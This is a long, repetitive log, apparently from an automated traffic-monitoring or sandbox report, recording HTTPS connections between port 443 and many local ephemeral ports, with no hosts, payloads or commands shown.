Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
